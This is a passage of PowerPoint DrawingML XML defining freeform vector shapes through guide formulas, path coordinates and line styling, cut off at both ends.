                <a:ext cx="72" cy="92"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 72"/>
                  <a:gd name="T1" fmla="*/ 90 h 92"/>
                  <a:gd name="T2" fmla="*/ 60 w 72"/>
                  <a:gd name="T3" fmla="*/ 77 h 92"/>
                  <a:gd name="T4" fmla="*/ 53 w 72"/>
                  <a:gd name="T5" fmla="*/ 63 h 92"/>
                  <a:gd name="T6" fmla="*/ 45 w 72"/>
                  <a:gd name="T7" fmla="*/ 66 h 92"/>
                  <a:gd name="T8" fmla="*/ 43 w 72"/>
                  <a:gd name="T9" fmla="*/ 63 h 92"/>
                  <a:gd name="T10" fmla="*/ 40 w 72"/>
                  <a:gd name="T11" fmla="*/ 58 h 92"/>
                  <a:gd name="T12" fmla="*/ 39 w 72"/>
                  <a:gd name="T13" fmla="*/ 64 h 92"/>
                  <a:gd name="T14" fmla="*/ 41 w 72"/>
                  <a:gd name="T15" fmla="*/ 73 h 92"/>
                  <a:gd name="T16" fmla="*/ 37 w 72"/>
                  <a:gd name="T17" fmla="*/ 75 h 92"/>
                  <a:gd name="T18" fmla="*/ 34 w 72"/>
                  <a:gd name="T19" fmla="*/ 80 h 92"/>
                  <a:gd name="T20" fmla="*/ 30 w 72"/>
                  <a:gd name="T21" fmla="*/ 73 h 92"/>
                  <a:gd name="T22" fmla="*/ 28 w 72"/>
                  <a:gd name="T23" fmla="*/ 78 h 92"/>
                  <a:gd name="T24" fmla="*/ 24 w 72"/>
                  <a:gd name="T25" fmla="*/ 80 h 92"/>
                  <a:gd name="T26" fmla="*/ 19 w 72"/>
                  <a:gd name="T27" fmla="*/ 81 h 92"/>
                  <a:gd name="T28" fmla="*/ 15 w 72"/>
                  <a:gd name="T29" fmla="*/ 75 h 92"/>
                  <a:gd name="T30" fmla="*/ 10 w 72"/>
                  <a:gd name="T31" fmla="*/ 50 h 92"/>
                  <a:gd name="T32" fmla="*/ 7 w 72"/>
                  <a:gd name="T33" fmla="*/ 45 h 92"/>
                  <a:gd name="T34" fmla="*/ 11 w 72"/>
                  <a:gd name="T35" fmla="*/ 37 h 92"/>
                  <a:gd name="T36" fmla="*/ 2 w 72"/>
                  <a:gd name="T37" fmla="*/ 32 h 92"/>
                  <a:gd name="T38" fmla="*/ 4 w 72"/>
                  <a:gd name="T39" fmla="*/ 25 h 92"/>
                  <a:gd name="T40" fmla="*/ 10 w 72"/>
                  <a:gd name="T41" fmla="*/ 21 h 92"/>
                  <a:gd name="T42" fmla="*/ 13 w 72"/>
                  <a:gd name="T43" fmla="*/ 19 h 92"/>
                  <a:gd name="T44" fmla="*/ 4 w 72"/>
                  <a:gd name="T45" fmla="*/ 11 h 92"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 8 h 92"/>
                  <a:gd name="T48" fmla="*/ 4 w 72"/>
                  <a:gd name="T49" fmla="*/ 1 h 92"/>
                  <a:gd name="T50" fmla="*/ 15 w 72"/>
                  <a:gd name="T51" fmla="*/ 2 h 92"/>
                  <a:gd name="T52" fmla="*/ 20 w 72"/>
                  <a:gd name="T53" fmla="*/ 7 h 92"/>
                  <a:gd name="T54" fmla="*/ 27 w 72"/>
                  <a:gd name="T55" fmla="*/ 7 h 92"/>
                  <a:gd name="T56" fmla="*/ 28 w 72"/>
                  <a:gd name="T57" fmla="*/ 13 h 92"/>
                  <a:gd name="T58" fmla="*/ 29 w 72"/>
                  <a:gd name="T59" fmla="*/ 19 h 92"/>
                  <a:gd name="T60" fmla="*/ 37 w 72"/>
                  <a:gd name="T61" fmla="*/ 21 h 92"/>
                  <a:gd name="T62" fmla="*/ 47 w 72"/>
                  <a:gd name="T63" fmla="*/ 20 h 92"/>
                  <a:gd name="T64" fmla="*/ 66 w 72"/>
                  <a:gd name="T65" fmla="*/ 23 h 92"/>
                  <a:gd name="T66" fmla="*/ 66 w 72"/>
                  <a:gd name="T67" fmla="*/ 30 h 92"/>
                  <a:gd name="T68" fmla="*/ 58 w 72"/>
                  <a:gd name="T69" fmla="*/ 38 h 92"/>
                  <a:gd name="T70" fmla="*/ 50 w 72"/>
                  <a:gd name="T71" fmla="*/ 42 h 92"/>
                  <a:gd name="T72" fmla="*/ 49 w 72"/>
                  <a:gd name="T73" fmla="*/ 48 h 92"/>
                  <a:gd name="T74" fmla="*/ 51 w 72"/>
                  <a:gd name="T75" fmla="*/ 54 h 92"/>
                  <a:gd name="T76" fmla="*/ 56 w 72"/>
                  <a:gd name="T77" fmla="*/ 59 h 92"/>
                  <a:gd name="T78" fmla="*/ 61 w 72"/>
                  <a:gd name="T79" fmla="*/ 47 h 92"/>
                  <a:gd name="T80" fmla="*/ 66 w 72"/>
                  <a:gd name="T81" fmla="*/ 46 h 92"/>
                  <a:gd name="T82" fmla="*/ 71 w 72"/>
                  <a:gd name="T83" fmla="*/ 70 h 92"/>
                  <a:gd name="T84" fmla="*/ 72 w 72"/>
                  <a:gd name="T85" fmla="*/ 86 h 92"/>
                  <a:gd name="T86" fmla="*/ 65 w 72"/>
                  <a:gd name="T87" fmla="*/ 92 h 9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72"/>
                  <a:gd name="T133" fmla="*/ 0 h 92"/>
                  <a:gd name="T134" fmla="*/ 72 w 72"/>
                  <a:gd name="T135" fmla="*/ 92 h 92"/>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72" h="92">
                    <a:moveTo>
                      <a:pt x="65" y="92"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="92"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36244" name="Freeform 377"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4284" y="2612"/>
                <a:ext cx="129" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 70 w 129"/>
                  <a:gd name="T1" fmla="*/ 243 h 244"/>
                  <a:gd name="T2" fmla="*/ 61 w 129"/>
                  <a:gd name="T3" fmla="*/ 241 h 244"/>
                  <a:gd name="T4" fmla="*/ 58 w 129"/>
                  <a:gd name="T5" fmla="*/ 239 h 244"/>
                  <a:gd name="T6" fmla="*/ 52 w 129"/>
                  <a:gd name="T7" fmla="*/ 233 h 244"/>
                  <a:gd name="T8" fmla="*/ 44 w 129"/>
                  <a:gd name="T9" fmla="*/ 230 h 244"/>
                  <a:gd name="T10" fmla="*/ 39 w 129"/>
                  <a:gd name="T11" fmla="*/ 228 h 244"/>
                  <a:gd name="T12" fmla="*/ 35 w 129"/>
                  <a:gd name="T13" fmla="*/ 216 h 244"/>
                  <a:gd name="T14" fmla="*/ 26 w 129"/>
                  <a:gd name="T15" fmla="*/ 207 h 244"/>
                  <a:gd name="T16" fmla="*/ 16 w 129"/>
                  <a:gd name="T17" fmla="*/ 201 h 244"/>
                  <a:gd name="T18" fmla="*/ 14 w 129"/>
                  <a:gd name="T19" fmla="*/ 189 h 244"/>
                  <a:gd name="T20" fmla="*/ 20 w 129"/>
                  <a:gd name="T21" fmla="*/ 168 h 244"/>
                  <a:gd name="T22" fmla="*/ 31 w 129"/>
                  <a:gd name="T23" fmla="*/ 133 h 244"/>
                  <a:gd name="T24" fmla="*/ 27 w 129"/>
                  <a:gd name="T25" fmla="*/ 113 h 244"/>
                  <a:gd name="T26" fmla="*/ 14 w 129"/>
                  <a:gd name="T27" fmla="*/ 91 h 244"/>
                  <a:gd name="T28" fmla="*/ 18 w 129"/>
                  <a:gd name="T29" fmla="*/ 75 h 244"/>
                  <a:gd name="T30" fmla="*/ 22 w 129"/>
                  <a:gd name="T31" fmla="*/ 67 h 244"/>
                  <a:gd name="T32" fmla="*/ 7 w 129"/>
                  <a:gd name="T33" fmla="*/ 49 h 244"/>
                  <a:gd name="T34" fmla="*/ 4 w 129"/>
                  <a:gd name="T35" fmla="*/ 33 h 244"/>
                  <a:gd name="T36" fmla="*/ 7 w 129"/>
                  <a:gd name="T37" fmla="*/ 25 h 244"/>
                  <a:gd name="T38" fmla="*/ 14 w 129"/>
                  <a:gd name="T39" fmla="*/ 13 h 244"/>
                  <a:gd name="T40" fmla="*/ 32 w 129"/>
                  <a:gd name="T41" fmla="*/ 3 h 244"/>
                  <a:gd name="T42" fmla="*/ 42 w 129"/>
                  <a:gd name="T43" fmla="*/ 0 h 244"/>
                  <a:gd name="T44" fmla="*/ 49 w 129"/>
                  <a:gd name="T45" fmla="*/ 8 h 244"/>
                  <a:gd name="T46" fmla="*/ 53 w 129"/>
                  <a:gd name="T47" fmla="*/ 18 h 244"/>
                  <a:gd name="T48" fmla="*/ 61 w 129"/>
                  <a:gd name="T49" fmla="*/ 27 h 244"/>
                  <a:gd name="T50" fmla="*/ 56 w 129"/>
                  <a:gd name="T51" fmla="*/ 48 h 244"/>
                  <a:gd name="T52" fmla="*/ 71 w 129"/>
                  <a:gd name="T53" fmla="*/ 40 h 244"/>
                  <a:gd name="T54" fmla="*/ 86 w 129"/>
                  <a:gd name="T55" fmla="*/ 44 h 244"/>
                  <a:gd name="T56" fmla="*/ 96 w 129"/>
                  <a:gd name="T57" fmla="*/ 34 h 244"/>
                  <a:gd name="T58" fmla="*/ 106 w 129"/>
                  <a:gd name="T59" fmla="*/ 43 h 244"/>
                  <a:gd name="T60" fmla="*/ 116 w 129"/>
                  <a:gd name="T61" fmla="*/ 67 h 244"/>
                  <a:gd name="T62" fmla="*/ 129 w 129"/>
                  <a:gd name="T63" fmla="*/ 89 h 244"/>
                  <a:gd name="T64" fmla="*/ 120 w 129"/>
                  <a:gd name="T65" fmla="*/ 102 h 244"/>
                  <a:gd name="T66" fmla="*/ 102 w 129"/>
                  <a:gd name="T67" fmla="*/ 101 h 244"/>
                  <a:gd name="T68" fmla="*/ 80 w 129"/>
                  <a:gd name="T69" fmla="*/ 115 h 244"/>
                  <a:gd name="T70" fmla="*/ 80 w 129"/>
                  <a:gd name="T71" fmla="*/ 130 h 244"/>
                  <a:gd name="T72" fmla="*/ 84 w 129"/>
                  <a:gd name="T73" fmla="*/ 139 h 244"/>
                  <a:gd name="T74" fmla="*/ 69 w 129"/>
                  <a:gd name="T75" fmla="*/ 130 h 244"/>
                  <a:gd name="T76" fmla="*/ 58 w 129"/>
                  <a:gd name="T77" fmla="*/ 129 h 244"/>
                  <a:gd name="T78" fmla="*/ 56 w 129"/>
                  <a:gd name="T79" fmla="*/ 117 h 244"/>
                  <a:gd name="T80" fmla="*/ 42 w 129"/>
                  <a:gd name="T81" fmla="*/ 117 h 244"/>
                  <a:gd name="T82" fmla="*/ 39 w 129"/>
                  <a:gd name="T83" fmla="*/ 132 h 244"/>
                  <a:gd name="T84" fmla="*/ 34 w 129"/>
                  <a:gd name="T85" fmla="*/ 152 h 244"/>
                  <a:gd name="T86" fmla="*/ 29 w 129"/>
                  <a:gd name="T87" fmla="*/ 185 h 244"/>
                  <a:gd name="T88" fmla="*/ 39 w 129"/>
                  <a:gd name="T89" fmla="*/ 185 h 244"/>
                  <a:gd name="T90" fmla="*/ 41 w 129"/>
                  <a:gd name="T91" fmla="*/ 195 h 244"/>
                  <a:gd name="T92" fmla="*/ 47 w 129"/>
                  <a:gd name="T93" fmla="*/ 206 h 244"/>
                  <a:gd name="T94" fmla="*/ 52 w 129"/>
                  <a:gd name="T95" fmla="*/ 221 h 244"/>
                  <a:gd name="T96" fmla="*/ 66 w 129"/>
                  <a:gd name="T97" fmla="*/ 225 h 244"/>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29"/>
                  <a:gd name="T148" fmla="*/ 0 h 244"/>
                  <a:gd name="T149" fmla="*/ 129 w 129"/>
                  <a:gd name="T150" fmla="*/ 244 h 244"/>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29" h="244">
                    <a:moveTo>
                      <a:pt x="75" y="234"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="74" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
